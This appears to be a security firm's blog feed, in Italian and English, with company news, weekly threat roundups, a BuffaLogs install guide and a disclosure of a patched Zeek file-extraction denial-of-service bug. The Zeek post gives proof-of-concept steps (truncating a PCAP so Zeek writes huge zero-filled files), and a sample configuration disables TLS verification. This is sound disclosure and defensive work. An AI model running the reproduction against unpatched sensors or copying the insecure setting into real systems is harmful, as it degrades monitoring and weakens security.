La sicurezza informatica è cruciale per ogni organizzazione, con le statistiche che indicano una continua crescita delle minacce informatiche. Le PMI devono adottare un approccio proattivo e rivisitare le loro strategie di difesa.

I servizi di Managed Detection & Response non sono un’opportunità solo alle grandi imprese, ma rappresentano un mezzo fondamentale per le PMI: sfruttando tecnologie, competenze e risorse fornite dal provider MDR, le PMI possono migliorare le attività di monitoraggio, semplificare la gestione delle minacce e adattare i sistemi di difesi alla continua evoluzione delle minacce emergenti.

State of cybersecurity - H3 2023

Tue, 28 Nov 2023 23:00:00 GMT

State of Cybersecurity è la ricerca realizzata da Certego per AUSED, l’Associazione tra Utenti di Sistemi e Tecnologie dell’informazione che raccoglie oltre duecento aziende.

L’obiettivo della ricerca, basata su un campione di 1.200.000 asset monitorati all’interno della piattaforma PanOptikon, è confrontare i volumi di attacco del 2023, con quelli del 2022. Il seguente report confronta il periodo Luglio-Settembre 2023 con lo stesso periodo dell'anno precedente.

Gli incidenti sono diventati più pericolosi? Quali sono le superfici di attacco più a rischio? Quali sono i settori maggiormente esposti? Qual è il rapporto tra falsi positivi e incidenti reali?

Sono alcune delle domande a cui rispondiamo all’interno del report.

Compila il form e ricevi il PDF

Weekly Highlights - November 24th

Thu, 23 Nov 2023 23:00:00 GMT

Citrix provides additional measures to address Citrix Bleed.

#Vulnerabilities

Citrix warns admins to kill NetScaler user sessions to block hackers.

Intel has notified its users of the existence of a high-criticality vulnerability in some of its processors.

#Vulnerabilities

The new vulnerability, tracked as Reptar, can be exploited for DoS attacks and privilege escalation.

According to European Central Bank, banks need to improve their controls on IT and cybersecurity risk.

#Finance and Cybersecurity

Board members will have to focus more on cyber resilience in order to quickly get their institutions fit for DORA regulation.

EU institutions conducted cybersecurity exercise

#European Union

EU institutions conducted cybersecurity exercise to test their crisis plans and possible responses to potential cybersecurity incidents affecting the European elections in 2024

)

Weekly Highlights - November 17th

Thu, 16 Nov 2023 23:00:00 GMT

ENISA published its 4th NIS Investments report

#Research

With major cyber incident costs up 25% in 2022, the report shows only a 0.4% rise in cybersecurity budget by EU operators in scope of the NIS Directive.

Australian ports reopen after a serious cyber attack

#Breaches & Incidents

Last week, the largest Australian port operator, DPWorld, suspended operations at several ports in the country following a cyber attack. Almost 30,000 containers have been stuck in Australian ports.

Last May, Denmark was hit by the largest cyberattack ever recorded in the Scandinavian country

#Breaches & Incidents

SektorCERT, the non-profit cybersecurity center for critical sectors in Denmark, has announced that last May, 22 energy firms were hacked in the largest coordinated attack on Denmark’s critical infrastructure.

Weekly Highlights - November 10th

Wed, 08 Nov 2023 23:00:00 GMT

MITRE Corporation released ATT&CK v14

#Threat Detection

MITRE released ATT&CK v14, the latest version of its widely used knowledge base of adversary tactics and techniques. This new version includes significant improvements to detections, ICS, mobile.

Google warns how hackers could abuse Calendar service

#Vulnerabilities

Google is warning of multiple threat actors sharing a public proof-of-concept (PoC) exploit that leverages its Calendar service to host command-and-control (C2) infrastructure.

BCE will conduct stress tests on european banks

#Finance and Cybersecurity

BCE is preparing the first stress test for European banks to asset the Incident Response procedures in case of serious attacks.

"Cyber risk insights: European banks IT complexity amplifies risk" analysis conducted by S&P Global Ratings, highlights how European banks are increasingly exposed to cyber risks.

Weekly Highlights - November 3rd

Thu, 02 Nov 2023 23:00:00 GMT

FIRST announced CVSS v4.0

#Threat Detection

FIRST, the global Forum of Incident Response and Security Teams, which includes more than 650 organizations, including Certego, from more than 100 countries, has officially announced CVSS v4.0, the next generation of the Common Vulnerability Scoring System standard to provide the highest fidelity of vulnerabilities.

Standard & Poor's cybersecurity global report

#Research

The Standard & Poor's Global report titled "Enhanced Corporate Cybersecurity Measures in Response to the Growing Prevalence of Cyber Attacks" highlights how the financial impact of cybercrime is steadily increasing for businesses.

Israeli entities under attack by MuddyWater’s spear-phishing advanced tactics

#Cyberwar

The Iranian cybercriminal group MuddyWater has launched a new spear-phishing campaign against two Israeli entities, utilizing advanced remote administration tools.

Boeing says cyber incident hit parts business after ransom threat

#Breaches and Incidents

Boeing, the aerospace industry leader, has acknowledged a cyber incident just days after ransomware gang LockBit reportedly exfiltrated sensitive data from the aerospace defense contractor. 

Migliorare il rilevamento dei login anomali con l'applicazione di Authentication Protection di Certego

Sun, 29 Oct 2023 23:00:00 GMT

Cos’è BuffaLogs?

BuffaLogs è un sistema di rilevamento dei login anomali. Il suo obiettivo è segnalare se viene effettuata una autenticazione da un nuovo dispositivo, da un nuovo paese e notificare i cosiddetti "Impossible Travel", ovvero i login che vengono effettuati in un range di tempo e da una distanza geografica non giustificabili dai convenzionali mezzi di trasporto. (ad esempio, un login dello stesso utente prima in Italia e poi in Cina nel giro di pochi minuti e ore).

BuffaLogs è stato sia rilasciato come software Open Source, sia integrato con successo all’interno della piattaforma MDR Certego PanOptikon®, per estendere la capacità di individuare gli accessi potenzialmente pericolosi sulle infrastrutture dei clienti Certego e migliorare le capacità di analisi del team di Detection and Response.

Come funziona?

Mediante l'applicazione di logiche di rilevamento specifiche, il sistema esamina ogni singolo accesso registrato su diverse sorgenti, quali firewall, applicazioni web o ambienti cloud. Lo scopo è individuare autenticazioni anomale e generare immediatamente notifiche di allarme.

Per rendere l'applicativo personalizzabile in base alle specifiche esigenze di ogni azienda, BuffaLogs consente di:

Definire un livello di rischio personalizzato per ciascun utente;
Applicare appositi filtri per escludere specifici accessi dalle attività di rilevamento, sia relativi ai Paesi da cui provengono o da specifici indirizzi IP.

Infine, possono anche essere notificati degli "utenti vip", con alti privilegi nel sistema, per i quali si desidera dedicare una particolare attenzione.

Qual è la caratteristica che lo rende innovativo?

A differenza delle soluzioni proprietarie, BuffaLogs si distingue come un'applicazione Open Source con codice sorgente pubblico. Questa particolare caratteristica, unita al fatto che l'applicazione è stata sviluppata internamente da Certego, ci permette di analizzare in modo dettagliato le ragioni per cui un allarme è stato attivato, consultare i dati grezzi circostanti e aggiornare il codice per rispondere alle nuove esigenze emergenti.

Come è nata l’idea?

L'idea è emersa dalla consapevolezza che il 90% delle compromissioni che rileviamo in ambienti cloud proviene da accessi legittimi effettuati con credenziali rubate. Sulla base di questa necessità, abbiamo deciso di sviluppare un applicativo per rafforzare ulteriormente il monitoraggio degli accessi.

BuffaLogs nasce da un progetto di tesi, raccontaci la tua esperienza

Durante il mio tirocinio di laurea triennale, ho avuto l'opportunità di svolgere un'esperienza formativa presso Certego. Ero entusiasta all'idea di entrare in un'azienda di punta nel settore della cybersecurity, in linea con la mia formazione, e allo stesso tempo in una realtà giovane e in rapida espansione, che dimostrava un reale interesse per le nuove risorse.

Sono stata assegnata al team di Threat Detection, dove mi sono immediatamente integrata sia a livello professionale che personale. Inizialmente mi era stato proposto un progetto meno implementativo, considerato il breve periodo di tempo messo a disposizione dal tirocinio universitario. Tuttavia, la mia richiesta di sviluppare un'applicazione completamente nuova è stata accolta con entusiasmo. Sembrava una vera corsa contro il tempo, ma ha altresì confermato la fiducia e il dinamismo che Certego dimostra nell'affrontare nuove sfide e accogliere proposte innovative quotidianamente.

Università, innovazione e giovani professionisti. È importante trovare un’azienda che creda nei giovani?

In un settore dinamico come la cybersecurity, caratterizzato da rapidi cambiamenti e l'incessante avanzamento delle tecnologie, ritengo sia cruciale sapersi adattare a questa trasformazione continua. Questo adattamento beneficia enormemente del contributo di menti giovani, che, anche se meno esperte, portano con sé una fresca prospettiva e la voglia di innovare.

La caratteristica distintiva che ho riscontrato in Certego è stata la reale fiducia e l'attenzione prestata, anche alle domande e alle prospettive meno esperte. Questo atteggiamento richiede che persino i professionisti più esperti siano disposti a mettere in discussione le loro idee; ed è proprio questo elemento che contraddistingue Certego.

Essere una giovane donna in un settore a prevalenza maschile, cosa significa? Le cose stanno cambiando?

Nel contesto più ampio dell'industria, è evidente che stiano avvenendo dei cambiamenti significativi. Tuttavia, non possiamo ignorare il fatto che, a parità di competenze, le donne affrontino ancora sfide più impegnative e debbano spesso combattere pregiudizi riguardo alle loro capacità professionali, specialmente quando si tratta di compiti come l'installazione di cavi o la scrittura di centinaia di righe di codice (afferma sorridendo).

Fortunatamente, Certego si distingue anche in questo aspetto; riconosce il valore di avere un team eterogeneo, dove si presta attenzione a diverse fasi del processo e si promuove un'analisi da prospettive diverse. Ciò consente di ottenere una visione completa e arricchita del contesto.

Quale consiglio daresti a ragazze e ragazzi che voglio intraprendere un percorso simile al tuo?

Siate curiosi. La curiosità è il motore dell'apprendimento, dell’impegno e della determinazione. Persino la passione nasce da un primo momento in cui si è stati semplicemente curiosi. Quindi... Non soffermatevi su l'insostenibile leggerezza dell'ETERE.

Weekly Highlights - October 27th

Thu, 26 Oct 2023 22:00:00 GMT

Okta says hackers breached its support system and accessed customer files

#Breaches and Incidents

Hackers gained access to Okta's customer support management system, allowing them to view private customer information, including sensitive data such as cookies and session tokens.

Citrix urges NetScaler ADC, Gateway customers to patch

#Vulnerabilities

Citrix is urging its customers to upgrade to the latest versions of NetScaler ADC and NetScaler Gateway due to reports of targeted attacks and session hijacking. The company released patches to address a critical vulnerability, CVE-2023-4966.

ENISA Threat landscape report 2023

#Research

ENISA has published the Threat Landscape (ETL) report, an annual report on the status of the cybersecurity threat landscape. It identifies the top threats, major trends observed with respect to threats, threat actors and attack techniques, as well as impact and motivation analysis.

State of cybersecurity

Mon, 09 Oct 2023 22:00:00 GMT

State of Cybersecurity è la ricerca realizzata da Certego per AUSED, l’Associazione tra Utenti di Sistemi e Tecnologie dell’informazione che raccoglie oltre duecento aziende. L’obiettivo della ricerca, basata su un campione di 1.200.000 asset monitorati all’interno della piattaforma PanOptikon, è confrontare i volumi di attacco del primo semestre del 2023, con quelli dello stesso periodo dell’anno precedente.

Solo nel 2023 sono aumentati del 42% gli attacchi informatici capaci di superare le prime linee di difesa, intaccando così la sicurezza delle organizzazioni.

Un trend che conferma la necessità, da parte delle imprese, di sviluppare strategie e adottare soluzioni in grado di rilevare attacchi informatici di ultima generazione, ma anche di destinare budget maggiori alla cybersecurity, che oggi rappresenta una delle principali fonti di rischio per il business aziendale.

Gli incidenti sono diventati più pericolosi? Quali sono le superfici di attacco più a rischio? Quali sono i settori maggiormente esposti? Qual è il rapporto tra falsi positivi e incidenti reali?

Sono alcune delle domande a cui rispondiamo all’interno del report.

Consulta il report completo:

BuffaLogs: Anomaly detection in login data

Lorena Goldoni, Threat Detection Engineer — Wed, 27 Sep 2023 22:00:00 GMT

Summary

Why should you monitor the logins of your company, right now?
How can BuffaLogs protect you?
How to install and configure BuffaLogs
- Monitor ssh logins
Would you like to collaborate with us?
Full featured log-in analysis

1. Why should you monitor the logins of your company, right now?

In the last few years, the security related to credential-based authentication systems has considerably been improving, implementing password strength meter and multi-factor authentication. Despite this, credential thefts, the first stage of a credential-based attack, have been increasing, too. In order to gain the victims’ credentials, the attackers can conduct a non-targeted phishing, such as in mass credential harvesting campaigns, or spear-phishing, carefully researching their targets, so as to disguise themselves as trusted senders in a reasonable context. Since credential stealing attacks are mainly based on human errors, these cyber intrusions are not always predictable by hunting systems. For these reasons, the purpose of this project is to provide an Open Source solution for the detection of anomalous logins.

2. How can BuffaLogs protect you?

BuffaLogs detects anomalies on login data: it is an early-warning system that notifies the user, so a login compromission can be seen and stopped before the attacker can do malicious activities.

In particular, the system sends three types of alert:

Impossible Travel: it occurs when a user logs into the system from a significant distance within a range of time that cannot be covered by conventional means of transport.
Login from new device: this alert is sent if the user utilizes an appliance for the first time.
Login from a new country: this alarm is dispatched if the system is logged by a user from a country where they have never authenticated before.

According to the triggered alerts, a risk level (no risk, low, medium or high) is assigned to each user of the company, in order to immediately have an overview about the accounts most at risk.

In addition, it is possible to configure some properties concerning the detection to be more accurate:

a list of the allowed countries, containing the states the users visit the most;
a list with the vip users of the company, so all the accounts with privilged positions;
the ignored ips, including all those networks or single IPs to ignore;
the ignored users in which the users to discard are stored.

3. How to install and configure BuffaLogs

BuffaLogs is a Docker containerized application, so it runs in isolated runtime environments that encapsulate all its dependencies, libraries and configuration file. For this reason, no software download or installation is required except for Docker and the Compose plugin. For example with the sudo apt-get install docker.io docker-compose on Ubuntu.

Once installed, you can download the application directly from the Docker Hub, with the sudo docker pull certego/buffalogs:<release_tag> command.

After that, there are two ways of running BuffaLogs, depending on your system configurations:

if you already have an elastic cluster:
- set the address of the host into the CERTEGO_ELASTICSEARCH variable in the buffalogs.env file
- launch docker-compose up -d to run the containers
if you have no hosts with Elasticsearch installed on it, you can run it directly with BuffaLogs:
- run docker-compose -f docker-compose.yml -f docker-compose.elastic.yml up -d in order to execute all the containers, included Elasticsearch and Kibana
- Now elasticsearch and kibana are running on the same host with BuffaLogs.

For now on the IP of the host were BuffaLogs is running will be referenced as BUFFALOGS_IP.

Now, you can start the detection of any type of logs, as long as they are compliant with the ECS - Elastic Common Schema. In particular, the fields used by BuffaLogs are:

{
    "_index": "<elastic_index>",
    "_id": "<log_id>",
    "@timestamp": "<log_timestamp>",
    "user": {
        "name": "<user_name>"
    },
    "source": {
        "geo": {
            "country_name": "<country_origin_log>",
            "location": {
                "lat": "<log_latitude>",
                "lon": "<log_longitude>"
            }
        },
        "ip": "<log_source_ip>"
    },
    "user_agent": {
        "original": "<log_device_user_agent>"
    },
    "event": {
        "type": "start",
        "category": "authentication",
        "outcome": "success"
    }
}

Below you can find an example that helps you to configure the system for monitoring ssh logins.

Monitor ssh logins

For monitoring ssh logins, first of all install Filebeat on every host you want to collect logs; secondly, for inspecting the syslog and authorization logs, it is necessary to set the path in the /etc/filebeat/modules.d/system.yml file:

- module: system
  syslog:
    enabled: true
    var.paths: ["/var/log/syslog*"]
  auth:
    enabled: true
    var.paths: ["/var/log/auth.log*"]

In order to send these events directly to Elasticsearch, set the authentication credentials in the /etc/filebeat/filebeat.yml file:

output.elasticsearch:
  hosts: ["https://localhost:9200"]
  username: "elastic"
  password: "********" 
  ssl:
    enabled: true
    verification_mode: "none"

Lastly, start the filebeat service: sudo systemctl start filebeat.service and you can inspect the BuffaLogs detection alerts on the GUI at localhosy:8000 or in the Django admin at localhost:8000/admin/.

Finally, start the filebeat service: sudo systemctl start filebeat.service and you will see login logs on filebeat-* index on Elasticsearch. BuffaLogs detection alerts and info are available on the GUI at BUFFALOGS_IP:8000 or in the Django admin at BUFFALOGS_IP:8000/admin/.

In particular, the results obtained are divided into different tables:

User: with the list of all the accounts and the relative risk level calculated;

Alert: with the triggered alert and the relative login information

BuffaLogs updates its data once every 30 minutes, so you have to wait a little bit to see some data. Otherwise, if you want to launch the detection manually, you can run the different management commands available, depending on your purpose:

to start the detection for the last 30 minutes, run python ./manage.py impossible_travel
to execute the detection for a given date, use python ./manage.py impossible_travel <start_date> <end_date>, for example: **python ./manage.py impossible_travel 2023-05-25 8:30:00 2023-05-25 14:30:00`

4. Full featured log-in analysis in PanOptikon®

Knowledge and technology used to build BuffaLogs are already integrated on Certego PanOptikon®, our proprietary Security Orchestration, Automation, and Response (SOAR) platform that enables real-time monitoring, incident analysis, and response activities, as well as direct interaction between the client's IT team and Certego's Detection & Response team. This will allow Certego to have full control over its detection mechanism and it can be personalized for the needs of your organization. Leveraging the information provided by our sensors and Threat Intelligence platform we have tailored BuffaLogs detection around our customers data: this allowed us to reduce false positive and improved detection compared to other solutions.

5. Would you like to collaborate with us?

In Certego, we strongly believe in the developers community. In the past, we have already released several open-source solutions, such as IntelOwl, which is Certego's Open Source Intelligence (#OSINT) solution. It has been a long-standing presence in the top 5 of the most famous open-source Threat Intelligence projects on the #GitHub platform, with over 2800 reviews. For this reason, BuffaLogs' basic detection logics were published with an open source license. In addition, BuffaLogs has attended the Google Summer of Code 2023 and one of the students is improving the graphical interface of the application, adapting it to the Certego UI. For more contributions or ideas, please visit the BuffaLogs GitHub page.

Health matters: start your authentication system check-up now!

Nuovo sito web Certego

Wed, 20 Sep 2023 22:00:00 GMT

Siamo felici di annunciare il lancio del nuovo sito web di Certego.

Il nuovo sito web presenta un design moderno, funzionalità migliorate e un accesso agevole a tutte le informazioni essenziali per aiutare le persone a scoprire i nostri servizi e prendere decisioni informate nel campo della sicurezza informatica.

Il nuovo sito aziendale fa parte dell'evoluzione continua del brand Certego. In occasione dei nostri primi dieci anni di vita abbiamo scelto di adottare il concetto di natura come metafora del nostro lavoro, poiché proprio come la natura si adatta costantemente all'ambiente circostante, la sicurezza informatica deve essere altamente adattabile per fronteggiare le minacce informatiche in evoluzione.

Abbiamo posto particolare attenzione nell'assicurare che l'esperienza dell'utente sia il più semplice e intuitiva possibile, grazie a una struttura chiara e intuitiva che presenta in modo efficace le nostre soluzioni.

Buona navigazione...

Zeek's file extraction DoS vulnerability discovered by Certego

Luca Cigarini — Tue, 19 Sep 2023 22:00:00 GMT

Hi everyone, Luca Cigarini here from Threat Detection Team in Certego!

While using Zeek, we detected a security vulnerabilty that was patched in the latest LTS version of the software (5.0.10 and 6.0.1).

Since it was interesting, we decided to write a blog post about it. But, before delving into the security issue let's talk briefly about Zeek.

What is Zeek?

Zeek's developers define the software as:

So Zeek can be used alongside IDSs(intrusion detection systems) to gather more data regarding suspicious or malicious activities. As a matter of fact, IDSs often provide only necessary data, so alerts are very light from this point of view. To perform a complete analysis, and so to decide whether the alert represents a false or a true positive, analysts need a huge amount of data though. Therefore Zeek is able to gather context data, vital to analysts' work.

File Extraction

A very cool feature provided by Zeek's File Analysis Framework is file extraction. As stated in the official documentation:

So, for example, Zeek is able to extract files from HTTP connections.

This can be very useful to monitor file flowing through the network and, later, gather enriched data regarding the file it has just seen. This can be done, for example, by uploading the extracted file or hash on VirusTotal.

Since huge files will take up a lot of space on disk and require more time for processing, it can be useful to set a maximum extraction size for files. This way, only files smaller than this limit will be extracted.

Zeek provides a redefinable variable to achive that:

FileExtract::default_limit

Default value is 0, so unlimited.

We decided to set it to 10 MiB and that's when we stumbled upon a weird situation.

DoS vulnerability

Even though we set the FileExtract::default_limit to 10 MiB we still saw files bigger than the limit being extracted by Zeek.

So we decided to do a bit of troubleshooting.

We thought it was a misconfiguration in our Zeek set up. We re-tested our deployment and we didn't discover any issues with our configuration: files bigger than 10 MiB were not extracted.

At this point we took a closer look to logs produced by the File Analysis Framework (files.log).

A file weighting 410 MiB was extracted by Zeek as we can see in the picture below.

By delving deeper into Zeek's file.log, we discovered that only ~1 MiB were seen of the 410 MiB! Also, according to Zeek, the software successfully extracted the first 10 MiB of data and then stopped processing the file.

So how have we ended up with a 410 MiB file?

We then decided to take a peek on the file raw data and we noticed that the first MiB was actual data while the rest was filled with zeros.

Looking at Zeek's source code helps us to better understand what causes this issue.

The Extract.cc file contains C++ code deputated to the file extraction. Here inside zeek::file_analysis::detail namespace we can find Extract class with two very important methods:

bool DeliverStream(const u_char* data, uint64_t len)
bool Undelivered(uint64_t offset, uint64_t len)

The first one write len number of bytes to of data to the extracted file. Basically it reconstruct the file from the connection/packets.

The second one write len number of undelivered bytes at offset distance from file start. This is where Zeek's failto check extracted file size. By taking a closer look of this method we can see the following statements:

if ( depth == offset ){
   char* tmp = new char[len]();
   if ( fwrite(tmp, len, 1, file_stream) != 1 ){
      ...
   }
   delete[] tmp;
   depth += len;
}

Basically, here developers instructed Zeek to write the len missing/undelivered bytes as zeroes into the extracted file. Without a check on the maximum extraction size this caused two issues:

Extraction of very large files.
A potential DoS (Denial of Service) issue. As a matter of fact:

Crafting files with large amounts of missing bytes

in them could cause Zeek to spend a long time processing data, allocate a lot of main memory, and write a lot of data to disk. Due to the possibility of receiving these packets from remote hosts, this is a DoS risk.

To overcome this issue, developers enforced file size limits before doing anything on the file. If file has not exceeded extracted size limit, the following statement is run:

fseek( file_stream, len + offset, SEEK_SET)

Instead of actually writing zeroes on the file, they moved the file pointer to the end of undelivered bytes, creating a sparse file.

Proof of concept

To reproduce this bug take the following steps:

Take a PCAP file with an HTTP connection containing a file (e.g. sniffing ubuntu iso download)
Delete a chunk of the PCAP (e.g. an arbitrary amount of packets from the middle of the recording).
Using Hosom file extraction module run Zeek in offline mode against our newly created PCAP file (e.g. zeek -C -r poc.pcap /path/to/local.zeek). Remember to import the module in local.zeek script file.
Take a look at the extracted file with an hex editor (e.g. xxd).

Certego MDR, un servizio su misura

Fri, 15 Sep 2023 22:00:00 GMT

Nel panorama informatico odierno, ogni azienda deve affrontare sfide di sicurezza, ma le organizzazioni fronteggiano rischi informatici molto diversi in base a dimensioni, settore, servizi e molti altri fattori.

In Certego, comprendiamo che ogni azienda ha esigenze diverse di cybersecurity: i servizi MDR non possono essere un servizio uguale per tutti, ma devono poter essere personalizzati in base agli specifici bisogni e caratteristiche di ogni azienda.

Scopri come Certego ti permette di avere una soluzione MDR personalizzata, perfettamente allineata con la tua infrastruttura, il tuo ambiente di lavoro e le politiche di sicurezza aziendali..

Compila il form e ricevi il PDF

SOC tradizionale VS Certego PanOptikon®

Thu, 14 Sep 2023 22:00:00 GMT

Le difese convenzionali non sono più efficaci contro gli attacchi di ultima generazione.

Grazie alla combinazione di tecnologia, competenze umane e informazioni sulle minacce, Certego propone una soluzione MDR di ultima generazione per bloccare gli attacchi più innovativi.

Scopri i principali vantaggi della nostra soluzione MDR.

Compila il form e ricevi il PDF

Certego - Intelligence Driven Managed Detection & Response

Wed, 13 Sep 2023 22:00:00 GMT

Le difese convenzionali non sono più efficaci contro gli attacchi di ultima generazione.

Oggi, qualsiasi organizzazione che desidera proteggersi efficacemente deve includere, oltre alle tecnologie di prevenzione, anche soluzioni di Managed Detection & Response attive 24/7.

Certego è il provider italiano di MDR con oltre 10 anni di esperienza nella lotta al cybercrime.

L’azienda è composta da analisti di sicurezza pluricertificati e “cacciatori” di minacce altamente specializzati dedicati a indagini approfondite per la ricerca e l’analisi degli attacchi, guidati da una piattaforma di analisi dati unica che da oltre 10 anni viene costantemente sviluppata e potenziata per adattarsi e rispondere alle nuove tipologie di minacce.

Scopri perchè più di 150 aziende hanno già scelto di affidarsi a Certego.

Compila il form e scarica il Company Profile

Cybersecurity 2023

Mon, 24 Jul 2023 22:00:00 GMT

Presentata in anteprima durante l’evento “La Forma dell’acqua” TEN YEARS OF CERTEGO, l’indagine commissionata ad Ipsos, con il supporto di 24ORE Business School, è ora disponibile.

Il report di ricerca, “Cybersecurity 2023, qual è la consapevolezza delle aziende italiane?” si propone di analizzare il livello e la consapevolezza delle organizzazini sui temi della digitalizzazione e della cybersecurity.

Il campione di ricerca comprende 220 interviste ad altrettante aziende italiane con almeno 10 addetti, nei settori dell’industria, commercio e servizi e un’unità di intervista rivolta ai responsabili nell’ambito della trasformazione digitale e della sicurezza informatica.

Alcuni punti fondamentali emersi dall’indagine:

il digitale viene ancora identificato primariamente come un costo e non come un investimento, specialmente per le aziende di piccole dimensioni;
permane un gap culturale sulla sicurezza informatica all'interno delle aziende;
vi è un’incongruenza tra la percezione del rischio informatico (le aziende si sentono sicure) e la mancanza di procedure operative di Incident Response da mettere in atto in caso di un attacco;
l’esigenza della formazione per sensibilizzare i propri dipendenti è molto sentita da tutte le aziende.

Compila il form per ricevere il report e approfondire i risultati della ricerca.

Certego X | La forma dell'acqua

Pier Giorgio Bergonzi — Thu, 22 Jun 2023 22:00:00 GMT

Quest'anno Certego festeggia i 10 anni della sua nascita. Per farlo abbiamo scelto due sedi esclusive: Palazzo di Varignana sulle colline di Bologna, un luogo sorprendente di sapori e sensazioni dalle radici antiche e Boom a Castel San Pietro Terme, il nuovo hub della conoscenza.

Sarà una giornata di incontri e di progetti. Giornalisti, accademici, sportivi, esperti di cybercrime ci accompagneranno per scoprire nuove forme di adattamento e difesa: perché la sicurezza è un percorso da fare insieme!

Scopri in anteprima i primi dettagli dell'evento.

Certego. la sicurezza informatica deve diventare adattiva

Thu, 22 Jun 2023 22:00:00 GMT

Certego, società italiana leader nella Cybersecurity, ha celebrato i 10 anni dalla fondazione, organizzando un evento celebrativo dal titolo evocativo “La forma dell’acqua”, a Palazzo di Varignana, sulle colline di Bologna. L’iniziativa, partendo da questo importante traguardo, ha avuto lo scopo di fare un punto sullo stato dell’arte della sicurezza informatica. Nell’ambito del digitale, 10 anni sono un tempo estremamente lungo, nel corso del quale il mondo è stato attraversato da eventi che hanno finito per accelerare e rendere estremamente complessa la gestione della sicurezza informatica, pensiamo in particolare, alla pandemia e alla guerra in Ucraina. Essere come l’acqua vuol dire essere capaci di trasformarsi in modo da poter agire al meglio in ogni situazione, perché la cyber security oggi non può più limitarsi ad essere preventiva, ma deve necessariamente essere adattiva.

L’evento, presentato dalla giornalista Marta Perego, ha visto susseguirsi sul palco, non solo esperti del settore, di profilo nazionale ed internazionale, ma anche sportivi, come Maurizia Cacciatori, la più amata Capitana della nostra Nazionale di Pallavolo, per raccontare la sicurezza informatica attraverso parallelismi sui temi dell’attacco e della difesa. Tra i partecipanti: Thomas Schreck, Professore di IT Security, Munich University of Applied Sciences, che ha mostrato le tendenze e le sfide emergenti che le organizzazioni dovranno affrontare nei prossimi anni, e Francesco Zampieri, Docente di Studi Strategici c/o l'Istituto di Studi Militari Marittimi (ISMM) e Ricercatore Senior nell'ambito del Centro Studi ISMM, che ha evidenziato la pervasività della minaccia cibernetica nel dominio marittimo.

L’iniziativa è stata aperta dall’intervento del CEO di Certego, Bernardino Grignaffini che ha evidenziato come “oggi ci troviamo di fronte ad una tempesta perfetta: alla crescita della digitalizzazione si associa, di fatto, una costante pervasività della criminalità informatica. Negli anni, abbiamo compreso di avere bisogno di una maggiore collaborazione pubblico-privato ma soprattutto dobbiamo essere consapevoli che senza un’analisi conoscitiva dei nostri avversari non è possibile contrastare questo fenomeno. Per questo il nostro obiettivo per il futuro – ha aggiunto Grignaffini – è quello di continuare ad investire sulla nostra piattaforma PanOptikon per essere in grado di rilevare le minacce e di intervenire in modo adeguato”. Alberto Valentini, Chief Information Security di Crif, ha sottolineato che “dal nostro osservatorio mondiale possiamo affermare come il fenomeno del cyber crime non risparmi oramai nessuna area geografica, ovunque il tema della criminalità informatica è pervasivo. Soprattutto, in termini di consapevolezza, dobbiamo comprendere che la cybersecurity è un tema di business non solo di information technology”.

L’indagine IPSOS sulla consapevolezza delle aziende italiane in tema di Cybersicurezza

Durante l’evento è stata presentata in anteprima l’indagine commissionata da Certego a Ipsos, con il supporto di 24ORE Business School, una delle principali scuole di formazione in Italia, sul tema “Cybersecurity 2023, qual è la consapevolezza delle aziende italiane.” Su un campione di circa 170.000 aziende italiane con almeno 10 addetti, nei settori dell’industria, commercio e servizi e un’unità di intervista rivolta ai responsabili nell’ambito della trasformazione digitale e della sicurezza informatica, è emerso che:

il digitale viene ancora identificato primariamente come un costo e non come un investimento, specialmente per le aziende di piccole dimensioni;
permane un gap culturale sulla sicurezza informatica all'interno delle aziende;
vi è un’incongruenza tra la percezione del rischio informatico (le aziende si sentono sicure) e la mancanza di procedure operative di Incident Response da mettere in atto in caso di un attacco;
l’esigenza della formazione per sensibilizzare i propri dipendenti è molto sentita da tutte le aziende.

Luigi Angelini, relazioni istituzionali di 24ORE Business School, ha commentato: “il ruolo della formazione sarà centrale nel fronteggiare la criminalità informatica; la persona giocherà un ruolo determinante anche rispetto allo sviluppo della tecnologia; in tale ottica, sarà necessario agire per sviluppare una cultura sul tema che porti ad accrescere la consapevolezza e crei competenze diffuse e di livello all’interno delle organizzazioni pubbliche e private”.

La sessione plenaria dell'evento ha visto come ultimo relatore Alessandro Di Carlo, Forensics & Product Manager di Certego, che ha ripercorso i primi albori tecnologici dell’azienda evidenziando come fin dalla nascita, essa si sia distinta per l’innovazione che è riuscita a portare all’interno del mercato della Cyber Security. “Basti pensare che nel 2013 il termine MDR (Managed Detection & Response) ufficialmente non aveva ancora visto la luce, venendo coniato solo successivamente da Gartner. Certego quindi ha avuto la lungimiranza di erogare un servizio assolutamente innovativo per l’epoca”. L’intervento ha poi evidenziato come, dietro un attacco informatico ci siano persone e che, per contrastarlo, la tecnologia di difesa richieda comunque il giudizio e la supervisione di un team di esperti in ambito cyber security. In chiusura, Alessandro ha avuto modo di evidenziare quelle che saranno le novità della piattaforma PanOptikon, disponibili nei prossimi mesi.

Nel pomeriggio, presso BOOM, l’innovativo hub della conoscenza di Crif, si è poi tenuta una sessione di training sui temi innovativi del cybercrime con percorsi di formazione e laboratori organizzati assieme ai partner dell’evento VMWARE, Qualys, Palantir e Hermes Bay, in particolare:

“Tabletop Exercise for CISO” – coordinato da Certego e Alessandro Calabrese - Senior Risk & Security Consultant, Hermes Bay: il gioco di ruolo pensato per confrontarti in piccoli gruppi, insieme ad altri professionisti, sulle scelte da prendere nelle diverse fasi di un incidente informatico e verificarne le conseguenze.

“NIS2: Aspetti e impatti tecnologici della nuova direttiva europea” – tenuto a Mattia Spagnoli - Lead Solution Engineer, VMWARE: laboratorio in cui si analizza, attraverso casi reali, come condurre attività di Response e Recovery in adempimento con i nuovi regolamenti UE.

Holistic Approach to Software Security, tenuto da Elad Foa - Security Chief Operating Officer, Palantir: un focus sull’importanza di un approccio olistico e di best practice condivise per gestire efficacemente le sfide della cyber sicurezza.

“Continuous Vulnerability Assessment: migliorare le attività di Detection conoscendo i propri punti deboli” – tenuto da rancesco Bassetto - Technical Account Manager, Qualys: laboratorio in cui si sperimenta come una strategia basata su attività di Continuous Vulnerability Assessment permette di migliorare la fase di Detection e predisporre eventuali procedure di Incident Response in tempi più rapidi.

IntelOwl v5 released!

Matteo Lodi, Threat Intel Team Leader — Mon, 29 May 2023 22:00:00 GMT

Certego has always been strongly involved and participating in open source projects.

For this reason, we created the IntelOwl project at the start of 2020 (see the blog post). At that moment we did know that the cyber security community really struggled in automating common and daily routine tasks. IntelOwl aimed at filling that gap.

We succeeded. We had strong feedback from the community: we reached almost 3k stars in Github and more and more people tried to participate in the project.

As Certego, we have been leveraging IntelOwl internally to facilitate and speed up the gathering of Threat Intelligence data. It is a tool that we can’t live without anymore.

